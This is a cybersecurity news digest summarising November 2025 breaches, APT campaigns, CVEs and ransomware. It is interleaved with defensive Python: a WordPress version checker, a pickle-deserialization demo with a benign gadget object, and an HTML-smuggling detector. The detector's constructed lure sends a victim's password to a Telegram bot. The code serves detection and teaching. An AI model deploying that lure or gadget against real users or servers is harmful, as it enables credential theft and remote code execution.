A new threat report from cybersecurity firm Darktrace highlights a dramatic increase in sophisticated cyber threats across the Asia-Pacific and Japan (APJ) region. The report, covering the 12 months to July 2025, details a surge in supply chain attacks, business email compromise, and cloud intrusions. State-sponsored groups from China (APT40, APT41) and North Korea (Lazarus/Bluenoroff) are reportedly leveraging generative AI to create more convincing phishing emails, particularly in non-English languages like Japanese. The report also notes the high cost of supply chain breaches and the use of advanced voice-phishing by groups like Scattered Spider.

Nov 19, 2025 · 7 min read

China-Aligned APT 'PlushDaemon' Wields 'EdgeStepper' Implant for Network Hijacking

Security researchers have uncovered a new, sophisticated network implant named 'EdgeStepper' used by the China-aligned APT group PlushDaemon. The implant provides the attackers with adversary-in-the-middle (AitM) capabilities, allowing them to intercept and hijack legitimate software updates within a compromised network. EdgeStepper is deployed as part of a larger toolset that includes 'LittleDaemon' and 'DaemonicLogistics' to deliver a Windows implant called 'SlowStepper'. This framework enables the APT group to conduct espionage and deploy additional malware by masquerading as legitimate update traffic.

Nov 19, 2025 · 7 min read

Togo and Mozambique Forge Cybersecurity Pact to Strengthen African Defenses

The nations of Togo and Mozambique have signed a Memorandum of Understanding (MoU) to formalize their cooperation on cybersecurity. The agreement, signed during the inaugural International Cybersecurity Week in Mozambique, establishes a framework for their national Computer Security Incident Response Teams (CSIRTs) to collaborate. The partnership will focus on sharing real-time threat intelligence, conducting joint capacity-building exercises, and coordinating operational responses to cyber incidents, aiming to bolster the digital resilience of both nations and the wider African continent.

Nov 19, 2025 · 4 min read

Vendor Breach Exposes Patient Data at Innovative Physical Therapy

Innovative Physical Therapy has notified patients of a data breach that originated from a third-party vendor responsible for practice management. The breach occurred when two vendor employees fell victim to phishing emails, leading to the compromise of their email accounts. Between June 25 and June 26, 2025, an unauthorized party accessed these accounts, which contained the protected health information (PHI) and personally identifiable information (PII) of at least 2,023 patients. The exposed data includes names, Social Security numbers, medical information, and health insurance details.

Nov 19, 2025 · 6 min read

Urgent Patch Required: Critical RCE Flaw in W3 Total Cache WordPress Plugin

A critical command injection vulnerability, CVE-2025-9501, with a CVSS score of 9.0, has been found in the W3 Total Cache WordPress plugin, which is active on over one million websites. The flaw allows unauthenticated attackers to achieve remote code execution (RCE) by simply submitting a malicious comment. This enables a complete site takeover. All versions prior to 2.8.13 are affected, and administrators are urged to update immediately.

Nov 18, 2025 · 5 min read
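The practical question after an advisory like this is whether an installed copy is below the fixed build. The script below is an added example, not code from the page or from the W3 Total Cache project: it reads the `Version:` field from a plugin's main-file header comment (the same header WordPress itself parses) and compares it against a small table of fixed versions. The table, the `wp-content/plugins` default path and the sample header are assumptions; the 2.8.13 fix version is the one stated above.

```python
import re
from pathlib import Path
from typing import Dict, List, Optional, Tuple

# Minimum safe versions as stated in the advisory summarised on this page.
# Extend this table with other plugins you track (key = plugin directory slug).
FIXED_VERSIONS: Dict[str, str] = {
    "w3-total-cache": "2.8.13",  # CVE-2025-9501
}

# The "Version:" field of a WordPress plugin's main-file header comment.
HEADER_RE = re.compile(r"^\s*\*?\s*Version:\s*([0-9][0-9A-Za-z.\-]*)", re.MULTILINE)

# Constructed sample of the header comment WordPress reads to identify a plugin.
SAMPLE_HEADER = """<?php
/**
 * Plugin Name: W3 Total Cache
 * Description: Performance optimization via caching (constructed sample header).
 * Version: 2.8.12
 */
"""


def parse_version(v: str) -> Tuple[int, ...]:
    """'2.8.12' -> (2, 8, 12). Non-numeric parts (e.g. a '-beta' suffix) sort below any number."""
    return tuple(int(p) if p.isdigit() else -1 for p in re.split(r"[.\-]", v))


def version_from_header(text: str) -> Optional[str]:
    """Return the Version: value from a plugin header comment, or None if absent."""
    m = HEADER_RE.search(text)
    return m.group(1) if m else None


def is_vulnerable(slug: str, version: str) -> bool:
    """True when an installed version is below the fixed version for a tracked slug."""
    fixed = FIXED_VERSIONS.get(slug)
    return fixed is not None and parse_version(version) < parse_version(fixed)


def scan_plugins_dir(plugins_dir: Path) -> List[Tuple[str, str, str]]:
    """Walk wp-content/plugins/<slug>/*.php and report (slug, installed, fixed) for
    every tracked plugin whose header version is below the fixed version."""
    findings = []
    for slug, fixed in FIXED_VERSIONS.items():
        plugin_dir = plugins_dir / slug
        if not plugin_dir.is_dir():
            continue
        for php in sorted(plugin_dir.glob("*.php")):
            version = version_from_header(php.read_text(errors="replace"))
            if version:
                if is_vulnerable(slug, version):
                    findings.append((slug, version, fixed))
                break  # the main file is the first one carrying a Version: header
    return findings


if __name__ == "__main__":
    import sys
    root = Path(sys.argv[1]) if len(sys.argv) > 1 else Path("wp-content/plugins")
    for slug, installed, fixed in scan_plugins_dir(root):
        print(f"{slug}: installed {installed}, fixed in {fixed} -> update required")
```

Run it against the `wp-content/plugins` directory of each site (or over a fleet via SSH); a plugin that has been updated by WP-CLI or the dashboard will show the new header on the next scan, so the same script doubles as the post-patch check.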

Kenyan Government Websites Defaced in Coordinated Cyberattack

On November 17, 2025, a coordinated cyberattack targeted and temporarily disabled numerous Kenyan government websites. The Ministry of Interior and National Administration confirmed the breach, which impacted the websites of the State House and ministries of Health, Education, and Energy, among others. Reports indicate several of the compromised sites were defaced with white supremacist slogans and symbols. The Kenyan government has since restored services and vowed to bring the perpetrators to justice.

Nov 18, 2025 · 5 min read

Merck Employee Data Breached in Third-Party Vendor Incident

Pharmaceutical giant Merck has confirmed a data breach impacting its current and former employees due to a cybersecurity incident at a third-party service provider, Graebel Companies. The breach, which occurred in September 2025, was disclosed on November 17. Exposed data includes sensitive PII such as names, Social Security numbers, and financial account information. Merck is offering 24 months of complimentary credit monitoring services to affected individuals.

Nov 18, 2025 · 5 min read

WordPress Security Plugin Ironically Contains Critical File-Read Flaw

A critical vulnerability, CVE-2025-11705, has been discovered in the 'Anti-Malware Security and Brute-Force Firewall' WordPress plugin, which is active on over 100,000 sites. The flaw allows any authenticated user, including low-privilege subscribers, to read arbitrary files from the server. This can be exploited to access the sensitive wp-config.php file, leading to a full database compromise and site takeover. Users are urged to update the plugin immediately.

Nov 18, 2025 · 5 min read

NSFOCUS Mitigates Massive 843 Gbps DDoS Attack on Critical Infrastructure

Security vendor NSFOCUS has detailed its successful effort to mitigate a massive multi-vector DDoS attack that targeted a critical infrastructure operator in October 2025. The attack peaked at an enormous 843.4 Gbps and 73.6 million packets per second, sustaining high volumes for over 30 minutes. The assault was dominated by a UDP flood, accounting for over 600 Gbps of the traffic. NSFOCUS's Cloud DDoS Protection Service successfully filtered over 99.9% of the malicious traffic, keeping the operator's services online.

Nov 18, 2025 · 5 min read

Cl0p Gang Exploits Oracle Zero-Day to Breach Logitech, Washington Post, and More

The notorious Cl0p cyber extortion gang has orchestrated a massive data breach campaign by exploiting a zero-day vulnerability in Oracle's E-Business Suite (EBS), tracked as CVE-2025-61882. Swiss electronics giant Logitech has confirmed it was a victim, filing a data breach notification with the SEC. The campaign has also compromised other major organizations, including The Washington Post, Allianz UK, and GlobalLogic. Cl0p is known for exploiting vulnerabilities in widely-used enterprise software to simultaneously hit a large number of high-value targets, exfiltrating data for double extortion.

Nov 18, 2025 · 5 min read

DoorDash Hit by Data Breach After Employee Targeted in Social Engineering Scam

Food delivery service DoorDash has confirmed a data breach after an employee was compromised by a social engineering scam, allowing an unauthorized third party to access internal systems. The breach exposed the names, physical addresses, phone numbers, and email addresses of an undisclosed number of customers in the United States, Canada, Australia, and New Zealand. The company has stated that financial information was not accessed. This incident highlights the persistent threat of attackers targeting the 'human element' to bypass technical security controls.

Nov 17, 2025 · 4 min read

Iranian APT 'SpearSpecter' Targets Officials' Families in Sophisticated Espionage Campaign

The Iranian state-sponsored group APT42 is conducting a sophisticated and ongoing espionage campaign, tracked by the Israel National Digital Agency as 'SpearSpecter', against senior defense and government officials. According to the agency, the threat actors use advanced social engineering tactics, including building trust over weeks and targeting victims' family members to apply psychological pressure. The campaign's technical core is 'TameCat', a modular PowerShell-based backdoor that operates in memory and uses legitimate services such as Telegram and Discord for stealthy command-and-control.

Nov 17, 2025 · 5 min read

Eurofiber Breach Exposes Thales, Orange, and French Government Data in Major Supply Chain Incident

European digital infrastructure provider Eurofiber has confirmed a major data breach in its French division, potentially exposing sensitive data from over 3,600 clients, including major corporations like Thales and Orange, and several French government ministries. A threat actor known as 'ByteToBreach' claims to have exploited vulnerabilities (CVE-2024-29889, CVE-2025-24799) in Eurofiber's GLPI IT asset management software via SQL injection. The stolen data, now for sale on the dark web, allegedly includes highly sensitive information such as SSH private keys, VPN configurations, and API keys, posing a severe supply chain risk.

Nov 17, 2025 · 5 min read

Pro-Russian Hackers Target Denmark with DDoS Attacks Ahead of Elections

The pro-Russian hacktivist group NoName057(16) has claimed responsibility for a series of Distributed Denial-of-Service (DDoS) attacks that targeted Danish government websites, political parties, and defense-related entities. The attacks, which occurred just before Denmark's municipal and regional elections, were designed to cause disruption and informational noise. Targets included the Danish Ministry of Transport and the national citizen portal, Borger.dk. While the outages were brief, the incident aligns with a pattern of politically motivated cyber activity by the group against European nations supporting Ukraine.

Nov 17, 2025 · 4 min read

Microsoft Patches Actively Exploited Windows Kernel Zero-Day in November Update

As part of its November 2025 Patch Tuesday release, Microsoft has addressed 63 security flaws, including a zero-day vulnerability in the Windows Kernel (CVE-2025-62215) that is being actively exploited. The flaw is an elevation of privilege vulnerability with a CVSS score of 7.0, allowing a local attacker to gain SYSTEM-level access. The vulnerability affects all supported versions of Windows and Windows Server. Due to its active exploitation in the wild, immediate patching is strongly recommended.

Nov 17, 2025 · 3 min read

Critical RCE Flaws in AI Engines From Meta, NVIDIA, Microsoft Discovered

Security researchers have discovered critical remote code execution (RCE) vulnerabilities in widely used AI inference servers from major tech companies, including Meta, NVIDIA, and Microsoft, as well as in open-source projects such as vLLM. The flaws share a root cause: network-exposed ZeroMQ (ZMQ) messaging endpoints whose messages are deserialized with Python's 'pickle' module, so anyone who can reach the socket can send a payload that executes code as soon as it is loaded. Exploitation could allow attackers to take full control of AI models and servers, posing a significant risk to enterprise AI infrastructure. Some instances, termed 'Shadow Vulnerabilities', remain unpatched in production environments.

Nov 16, 2025 · 6 min read
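The root cause described above is worth seeing concretely. The block below is an added example, not code from the page or from any of the affected projects: a constructed object whose `__reduce__` makes pickle call a global on load (the harmless `platform.system` stands in for `os.system`), the vulnerable pattern of loading whatever arrives, and a restricted unpickler that refuses any global not on an explicit allow-list. The payload bytes and the allow-list contents are assumptions.

```python
import io
import pickle
import platform
from typing import Any, Tuple


class Gadget:
    """Constructed stand-in for an attacker-supplied object. On unpickle, the REDUCE
    opcode calls the referenced global with the stored arguments: here the harmless
    platform.system(), where a real payload would reference os.system or subprocess.Popen."""

    def __reduce__(self):
        return (platform.system, ())


# What would arrive over an exposed socket (constructed here for the demonstration).
ATTACKER_PAYLOAD = pickle.dumps(Gadget())
BENIGN_PAYLOAD = pickle.dumps({"prompt": "hello", "max_tokens": 8})


def unsafe_load(data: bytes) -> Any:
    """The vulnerable pattern: deserialize whatever the peer sent. This is what
    pyzmq's socket.recv_pyobj() does to the wire bytes."""
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    """Resolves only allow-listed globals; everything else is refused before any
    callable from the payload can run. Plain containers need no globals at all."""

    ALLOWED = {("builtins", "dict"), ("builtins", "list"), ("builtins", "set")}

    def find_class(self, module: str, name: str):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to import {module}.{name}")


def safe_load(data: bytes) -> Tuple[bool, Any]:
    """(True, obj) for payloads that use only allow-listed globals, else (False, reason)."""
    try:
        return True, RestrictedUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError as exc:
        return False, str(exc)


if __name__ == "__main__":
    print("unsafe:", unsafe_load(ATTACKER_PAYLOAD))  # code from the payload ran
    print("safe:  ", safe_load(ATTACKER_PAYLOAD))    # refused before anything ran
    print("safe:  ", safe_load(BENIGN_PAYLOAD))      # ordinary request data still loads
```

The allow-list is defense in depth, not the fix: the fix is to stop accepting pickle from the network at all (JSON, msgpack or protobuf for request data) and to keep the ZMQ socket off untrusted networks, bound to localhost or protected with ZMQ's CURVE authentication. Allowing `builtins.getattr` or similar helpers in `find_class` would reopen the hole.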

RansomHouse Hits H&M and Adidas Supplier in Major Fashion Supply Chain Attack

The RansomHouse ransomware group has attacked Fulgar S.p.A., a major Italian textile manufacturer and a key supplier for global fashion brands like H&M and Adidas. The attack, confirmed on November 3, 2025, resulted in the exfiltration and leak of sensitive corporate data. This incident highlights the significant and growing risk of supply chain attacks in the fashion industry, where a compromise at a single supplier can have cascading impacts on major international retailers.

Nov 16, 2025 · 5 min read

Pig Butchering Scams Evolve into Global Cybercrime Menace, FBI Warns

A new threat intelligence report, supported by warnings from the FBI, details the rapid evolution of "Pig Butchering" scams into one of the most economically damaging forms of global cybercrime. These sophisticated, long-con investment schemes leverage social engineering, emotional grooming, and fraudulent cryptocurrency trading platforms to defraud victims of massive sums. The scam involves building a relationship of trust over weeks or months before convincing the victim to invest in a fake, high-yield opportunity.

Nov 16, 2025 · 6 min read

APT Caught Exploiting Cisco & Citrix Zero-Days in Sophisticated Attack

Amazon's threat intelligence team has discovered a sophisticated advanced persistent threat (APT) campaign that exploited two vulnerabilities as zero-days, before their public disclosure: CVE-2025-20337 in Cisco Identity Services Engine (ISE) and CVE-2025-5777 in Citrix NetScaler ADC/Gateway (the 'CitrixBleed 2' memory over-read). The Cisco flaw gave the attackers pre-authentication remote code execution on ISE, where they deployed custom, in-memory malware designed to evade detection. This discovery highlights a growing trend of targeting identity and access management systems at the network edge and underscores the capabilities of highly resourced threat actors.

Nov 16, 2025 · 6 min read

Ransomware Attacks Surge 50% in 2025; Qilin Group Takes the Lead

Cybersecurity researchers report a staggering 50% increase in ransomware attacks in 2025, with over 5,000 incidents claimed on dark web leak sites by late October. This surge occurs amidst a significant realignment in the ransomware ecosystem, with formerly dominant groups fading while new and resurgent actors like Qilin take their place. The Qilin group has been particularly prolific, leading in victim counts for most of the past six months. The United States remains the most targeted nation, and the industrial sector is the most heavily impacted industry. PowerShell has become the primary tool for attackers, used in nearly 78% of observed campaigns.

Nov 15, 2025 · 5 min read

Checkout.com Rejects Ransom After ShinyHunters Breach, Donates to Research

The global payment processor Checkout.com has disclosed a data breach orchestrated by the ShinyHunters cybercrime group. The attackers exploited a legacy third-party cloud file storage system that was improperly decommissioned. After being contacted with a ransom demand, Checkout.com refused to pay. In a bold move, the company announced it will instead donate the equivalent ransom amount to cybersecurity research institutions, including Carnegie Mellon University and the University of Oxford. The breach did not impact the core payment platform or cardholder data.

Nov 15, 2025 · 4 min read

Fortinet Patches Actively Exploited FortiWeb Zero-Day (CVE-2025-64446)

Fortinet has released a patch for a critical, actively exploited zero-day vulnerability in its FortiWeb web application firewall (WAF). The flaw, tracked as CVE-2025-64446, is a relative path traversal vulnerability that allows an unauthenticated remote attacker to execute arbitrary administrative commands by sending specially crafted HTTP/S requests. Due to evidence of active exploitation, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, mandating that federal agencies patch it immediately. The flaw affects a wide range of FortiWeb versions, making immediate patching a top priority for all customers.

Nov 15, 2025 · 4 min read

150,000+ Malicious NPM Packages Flood Registry in Crypto Token Farming Scheme

Security researchers from Amazon have uncovered one of the largest package flooding incidents in the history of the npm open-source registry, involving over 150,000 malicious packages. In a novel twist, the campaign was not designed for traditional malicious activities like stealing credentials or deploying ransomware. Instead, the attackers aimed to conduct a large-scale token farming operation by exploiting the incentive system of tea.xyz, a decentralized protocol that rewards open-source developers with 'TEA tokens'. The self-replicating packages automatically generated and published new junk packages, each linked to the attackers' blockchain wallets, polluting the ecosystem and abusing the reward mechanism.

Nov 15, 2025 · 4 min read

Critical 9.8 CVSS Auth Bypass Flaw in NVIDIA AIStore Disclosed

The Zero Day Initiative (ZDI) has publicly disclosed a critical authentication bypass vulnerability in NVIDIA's AIStore, an open-source object storage platform for AI applications. The flaw, tracked as CVE-2025-33186, carries a CVSS score of 9.8 and is caused by hard-coded credentials within the platform's authentication component. A remote, unauthenticated attacker could exploit this vulnerability to completely bypass authentication and gain unauthorized access to the system, compromising the confidentiality and integrity of AI models and data. A second, high-severity information disclosure flaw (CVE-2025-33185) was also disclosed.

Nov 15, 2025 · 4 min read

CISA Warns Cisco ASA Devices Still Under Attack, Issues New Patch Guidance

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued follow-up implementation guidance for its September Emergency Directive 25-03, which addresses two critical, actively exploited vulnerabilities in Cisco ASA and Firepower devices. The flaws are CVE-2025-20333, a buffer overflow in the VPN web server that yields remote code execution, and CVE-2025-20362, a missing-authorization bug that lets an unauthenticated attacker reach restricted endpoints; chained, they give unauthenticated code execution, and they are still being targeted by threat actors, including the China-linked group Storm-1849 (ArcaneDoor). CISA warns that many organizations applied patches incorrectly, for example by updating to a release that does not contain the fix, leaving them vulnerable. The new guidance provides corrective actions and recommends further mitigation for devices that were not updated properly.

Nov 15, 2025 · 4 min read

Search Guard FLX Vulnerability (CVE-2025-12149) Allows DLS Bypass

A medium-severity information disclosure vulnerability, CVE-2025-12149, has been disclosed in floragunn's Search Guard FLX, a security plugin for Elasticsearch. The flaw, affecting versions up to 3.1.2, allows an attacker to bypass Document-Level Security (DLS) rules. This occurs specifically when a search is triggered from a Signals watch, an alerting component of the plugin. A low-privileged user who can create or trigger a watch could exploit this to access all documents in queried indices, exposing sensitive data that should be protected by DLS permissions.

Nov 15, 2025 · 3 min read

AWS Outage in us-east-1 Knocks Major Global Services Offline

A significant infrastructure fault within Amazon Web Services' (AWS) us-east-1 region in North Virginia on October 20, 2025, triggered a global outage affecting numerous major online services. Platforms including Snapchat, Fortnite, Disney Plus, and various banking applications experienced widespread disruptions. The incident, caused by issues with core services like DynamoDB and EC2, highlights the critical dependency of the digital economy on a few major cloud providers and underscores the importance of robust architectural resilience.

Nov 14, 2025 · 6 min read

Palo Alto Firewalls Vulnerable to Remote Reboot Attack via DoS Flaw

Palo Alto Networks has disclosed a medium-severity denial-of-service (DoS) vulnerability, CVE-2025-4619, affecting its PAN-OS software. The flaw enables an unauthenticated, remote attacker to reboot firewalls by sending specially crafted packets. Repeated exploitation can force the device into maintenance mode, disrupting network traffic and disabling security protections. The vulnerability impacts PA-Series and VM-Series firewalls with specific configurations. Patches are available and customers are urged to upgrade.

Nov 14, 2025 · 4 min read

Suspected GRU 'Fancy Bear' Hacker Linked to 2016 Election Interference Arrested in Thailand

A Russian national believed to be Aleksey Lukashev, a high-level military intelligence officer in Russia's GRU, has been arrested in Phuket, Thailand. The arrest was part of a joint operation between Thai authorities and the U.S. FBI. Lukashev is one of 12 GRU officers indicted by the U.S. Department of Justice in 2018 for his alleged role in the APT28 (Fancy Bear) hacking operations that targeted Democratic Party organizations during the 2016 U.S. election. He now faces extradition to the United States.

Nov 14, 2025 · 3 min read

Team Europe Wins Global Cybersecurity Challenge for Fourth Consecutive Year

For the fourth year in a row, Team Europe has won the International Cybersecurity Challenge (ICC), a prestigious global competition designed to showcase and develop young cybersecurity talent. The event, hosted in Tokyo, Japan, brought together teams from eight regions worldwide. Organized and supported by the EU Agency for Cybersecurity (ENISA), the victory highlights Europe's strong investment in nurturing the next generation of cybersecurity professionals. Team Asia and the US Cyber Team secured second and third place, respectively.

Nov 14, 2025 · 2 min read

Anthropic Disrupts First AI-Orchestrated Cyber Espionage Campaign

AI safety and research company Anthropic has reported disrupting what it believes is the first large-scale cyber espionage campaign orchestrated by an AI with a high degree of autonomy. The company detected a threat actor, assessed to be a Chinese state-sponsored group, manipulating its 'Claude Code' AI tool. The AI was used to attempt infiltration of approximately 30 global organizations, including tech companies, financial institutions, and government agencies. The incident marks a significant evolution in the use of AI in offensive cyber operations.

Nov 14, 2025 · 4 min read

New Tools From Legit Security and Cyware Tackle AI Code and Ops Risks

As AI adoption accelerates in software development and security, vendors are releasing new solutions to manage the inherent risks. Legit Security has launched 'VibeGuard,' a tool designed to secure AI-generated code within integrated development environments (IDEs). Simultaneously, Cyware has upgraded its 'Quarterback AI' platform to function as an 'AI Fabric' for security operations, aiming to boost threat intelligence and analyst productivity. These launches highlight the industry's focus on both securing AI's use and using AI for defense.

Nov 14, 2025 · 3 min read

Patch Now: Microsoft Scrambles to Fix Actively Exploited Windows Kernel Zero-Day

Microsoft has released its November 2025 Patch Tuesday updates, addressing 63 vulnerabilities, including an actively exploited Windows Kernel zero-day (CVE-2025-62215, CVSS 7.0). This privilege escalation flaw allows a local attacker to gain full SYSTEM-level control of affected Windows and Windows Server systems. Because of the active exploitation, CISA has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, mandating patching by federal agencies. The update also fixes the release's critical-rated flaws, among them a severe remote code execution vulnerability (CVE-2025-60724) in the Microsoft Graphics Component.

Nov 13, 2025 · 6 min read

GAME OVER: 'Operation Endgame' Dismantles Global Cybercrime Services

In a massive international crackdown dubbed 'Operation Endgame,' law enforcement agencies from 11 countries, coordinated by Europol, have dismantled the infrastructure of three major cybercrime-as-a-service platforms: the Rhadamanthys information stealer, the VenomRAT remote access trojan, and the Elysium botnet. The operation resulted in the seizure of over 1,025 servers, the takedown of 20 domains, and the arrest of the main suspect behind VenomRAT. The targeted malware was responsible for infecting hundreds of thousands of computers worldwide, stealing vast amounts of data, including millions in cryptocurrency.

Nov 13, 2025 · 5 min read

Synnovis Confirms Patient Data Stolen in Qilin Ransomware Attack on London Hospitals

Pathology service provider Synnovis has officially confirmed that patient personal data, including names, NHS numbers, and dates of birth, was stolen during the June 2024 ransomware attack attributed to the Qilin gang. The attack caused widespread disruption to London hospitals, leading to the cancellation of over 1,100 procedures. After a lengthy forensic investigation, Synnovis acknowledged the data breach, which followed the attackers leaking approximately 400GB of data. Affected NHS trusts are now beginning the process of notifying individual patients whose information was compromised.

Nov 13, 2025 · 6 min read

Retailers Unprepared for AI-Powered Cyberattack Tsunami, Report Warns

A new report from managed security provider LevelBlue reveals a troubling state of cybersecurity in the retail sector. The study found that 44% of retailers have experienced a significant increase in cyberattacks, with many feeling unprepared for the next wave of AI-powered threats. Despite 45% of executives expecting AI-driven attacks, only 25% believe their organization is ready to defend against them. The report also highlights major weaknesses in supply chain security, with nearly half of retailers admitting to having poor visibility into their suppliers' security practices, creating significant risk across the industry.

Nov 13, 2025 · 5 min read

Dell Patches Critical 9.1 CVSS Flaw in Data Lakehouse Platform

Dell has released a security update to address a critical vulnerability (CVE-2025-46608) in its Data Lakehouse platform, which received a CVSS score of 9.1. The flaw is an improper access control issue that could be exploited by a remote, high-privileged attacker to gain further elevated rights and potentially compromise the entire system. Due to the severity and the potential for a complete confidentiality, integrity, and availability loss, Dell is urging all customers to upgrade to version 1.6.0.0 immediately.

Nov 13, 2025 · 5 min read

CISA KEV Alert: WatchGuard and Triofox Flaws Now Under Active Attack

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added three new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, indicating they are under active attack. The additions include CVE-2025-9242, an out-of-bounds write flaw in WatchGuard Firebox appliances, and CVE-2025-12480, an improper access control vulnerability in Gladinet's Triofox product. The third is the recently disclosed Windows Kernel zero-day, CVE-2025-62215. Federal agencies are now mandated to patch these flaws by a specified deadline, and CISA strongly urges all organizations to prioritize remediation.

Nov 13, 2025 · 4 min read

Stealthy Phishing Attack Uses HTML Smuggling & Telegram Bots to Steal Credentials

A sophisticated phishing campaign is targeting organizations across Central and Eastern Europe, using HTML smuggling to deliver credential harvesting forms. Researchers at Cyble discovered the attack, which uses malicious HTML file attachments to bypass email security filters. Once a victim enters their credentials into the fake login page, an embedded JavaScript code exfiltrates the data directly to the attackers' private Telegram channels via the Telegram Bot API. This technique makes the campaign highly evasive, as it avoids the use of traditional, blockable C2 infrastructure.

Nov 13, 2025 · 5 min read
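Because the exfiltration goes to api.telegram.org rather than to attacker-owned infrastructure, the useful detection point is the attachment itself. The scanner below is an added example, not code from the page or from Cyble: it runs a few regex heuristics over an HTML attachment body, looking for the two behaviours described above (client-side reconstruction of the real page from an embedded base64 blob, and a submit handler that posts to the Telegram Bot API's `sendMessage` endpoint, whose `https://api.telegram.org/bot<token>/sendMessage` shape is public). The indicator names, the thresholds and both HTML samples are constructed assumptions.

```python
import re
from typing import Set

# Heuristics for the behaviours described above. Indicator names are my own.
INDICATORS = {
    # JavaScript that decodes an embedded blob and rebuilds a page or file from it
    "smuggling_decode": re.compile(r"\batob\s*\(|\bnew\s+Blob\s*\(|\bUint8Array\b"),
    # ...and then renders or hands the result to the browser
    "smuggling_deliver": re.compile(r"createObjectURL\s*\(|msSaveOrOpenBlob|document\.write\s*\("),
    # An inline base64 run long enough to be an embedded page rather than a token
    "large_base64_blob": re.compile(r"[A-Za-z0-9+/]{400,}={0,2}"),
    # A password field in a standalone HTML attachment is itself unusual
    "credential_form": re.compile(r"type\s*=\s*['\"]password['\"]", re.I),
    # Telegram Bot API as the drop point: https://api.telegram.org/bot<token>/sendMessage
    "telegram_bot_api": re.compile(r"api\.telegram\.org/bot[^/'\" ]+/(sendMessage|sendDocument)"),
}

# Constructed sample in the shape of the lure: a base64 blob decoded into a fake login
# page whose submit handler posts the credentials to a bot (token is made up).
B64_BLOB = "QUJDREVG" * 60  # stands in for the encoded page; real ones run to tens of KB
SAMPLE_SMUGGLED = (
    "<html><body><script>\n"
    "var page = atob('" + B64_BLOB + "');\n"
    "document.write(page);\n"
    "document.forms[0].onsubmit = function() {\n"
    "  fetch('https://api.telegram.org/bot123456:ABCDEF-constructed/sendMessage', {\n"
    "    method: 'POST', body: JSON.stringify({chat_id: '42', text: this.password.value})});\n"
    "};\n"
    "</script><form><input type='password' name='password'></form></body></html>\n"
)

# Constructed benign attachment for comparison.
SAMPLE_BENIGN = (
    "<html><body><h1>Quarterly newsletter</h1>"
    "<p>Read more at <a href='https://example.com/news'>example.com</a></p></body></html>"
)


def scan_html(text: str) -> Set[str]:
    """Names of every indicator that fires on the attachment body."""
    return {name for name, rx in INDICATORS.items() if rx.search(text)}


def is_suspicious(text: str) -> bool:
    """Flag when the page talks to the Telegram Bot API at all, or both decodes an
    embedded blob and carries a large base64 payload for it to decode."""
    hits = scan_html(text)
    return "telegram_bot_api" in hits or {"smuggling_decode", "large_base64_blob"} <= hits


if __name__ == "__main__":
    for label, sample in (("smuggled", SAMPLE_SMUGGLED), ("benign", SAMPLE_BENIGN)):
        verdict = "SUSPICIOUS" if is_suspicious(sample) else "ok"
        print(f"{label}: {sorted(scan_html(sample))} -> {verdict}")
```

The base64 heuristic is deliberately combined with the decode indicator rather than used alone, because inline images in legitimate HTML mail also produce long base64 runs. At a gateway the same logic belongs in a YARA rule over `.html`/`.htm` attachments; an egress block on api.telegram.org is a blunter but effective complement where the business does not use Telegram.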

Microsoft Patches Actively Exploited Windows Kernel Zero-Day in November Patch Tuesday

Microsoft's November 2025 Patch Tuesday update addresses 63 vulnerabilities, including an actively exploited Windows Kernel privilege escalation zero-day (CVE-2025-62215). The flaw, which has a CVSS score of 7.0, allows a local attacker to gain SYSTEM-level privileges. The release also patches the month's critical-rated vulnerabilities, notably a remote code execution flaw in the Microsoft Graphics Component (GDI+) with a CVSS score of 9.8 (CVE-2025-60724). Other significant fixes address high-severity issues in Windows Kerberos, Microsoft Office, and Visual Studio, and administrators should apply the update promptly to prevent system compromise.

Nov 12, 2025 · 5 min read

Advanced Threat Actor Exploits Cisco and Citrix Zero-Days in Targeted Attacks on Network Infrastructure

Amazon's threat intelligence team has discovered an advanced threat actor that exploited two then-undisclosed zero-day vulnerabilities in Cisco Identity Services Engine (ISE) and Citrix NetScaler Application Delivery Controllers (ADC). The vulnerabilities, now tracked as CVE-2025-20337 (Cisco) and CVE-2025-5777 (Citrix), were used to target critical identity and network access control infrastructure. The attackers leveraged custom malware to gain initial access and establish persistence on these edge devices. Both vendors have since released patches; because the exploitation predated disclosure, any ISE or NetScaler appliance that ran an unpatched build during that window should be investigated for web shells and rogue accounts, not merely updated.

Nov 12, 2025 · 5 min read

UK Introduces Sweeping Cyber Security and Resilience Bill to Regulate MSPs and Mandate Stricter Breach Reporting

The UK government has introduced the Cyber Security and Resilience Bill to Parliament, a landmark piece of legislation set to replace the 2018 NIS Regulations. This new bill significantly expands the regulatory landscape by bringing Managed Service Providers (MSPs) into scope for the first time, a move impacting up to 1,100 firms. It also imposes stricter incident reporting rules, requiring an initial report within 24 hours and a full report within 72 hours. The legislation aims to bolster national security by strengthening supply chain resilience and aligning the UK with updated international standards like the EU's NIS2 Directive.

Nov 12, 2025 · 4 min read

Clop Ransomware Gang Claims Attack on Dartmouth College, Threatens to Leak Data

The notorious Clop ransomware gang has claimed responsibility for a cyberattack against Dartmouth College, an Ivy League university in the U.S. On November 11, 2025, the group added the institution to its dark web leak site, threatening to publish exfiltrated data if the university does not enter negotiations. This incident highlights the increasing trend of ransomware attacks targeting the education sector, which holds vast amounts of sensitive personal data. Dartmouth College has not yet issued a public statement on the alleged breach, but the threat from Clop is considered highly credible due to the group's track record.

Nov 12, 2025 · 5 min read

Iranian APT 'Ferocious Kitten' Continues to Target Dissidents With Custom MarkiRAT Surveillance Malware

The Iranian-aligned APT group 'Ferocious Kitten' continues its long-running cyber-espionage campaign against Iranian dissidents and activists, according to new research from Picus Security. Active since at least 2015, the group uses spear-phishing emails with malicious Office documents to deploy its custom remote access trojan (RAT), MarkiRAT. This malware is a sophisticated surveillance tool, featuring an advanced keylogger that activates only when password managers are not in use, clipboard hijacking, and data exfiltration over HTTP/S. The group also employs various defense evasion techniques, including the use of BITS and the RTLO trick to disguise malicious files.

Nov 12, 2025 · 5 min read

Critical Triofox Zero-Day Actively Exploited for System-Level Access

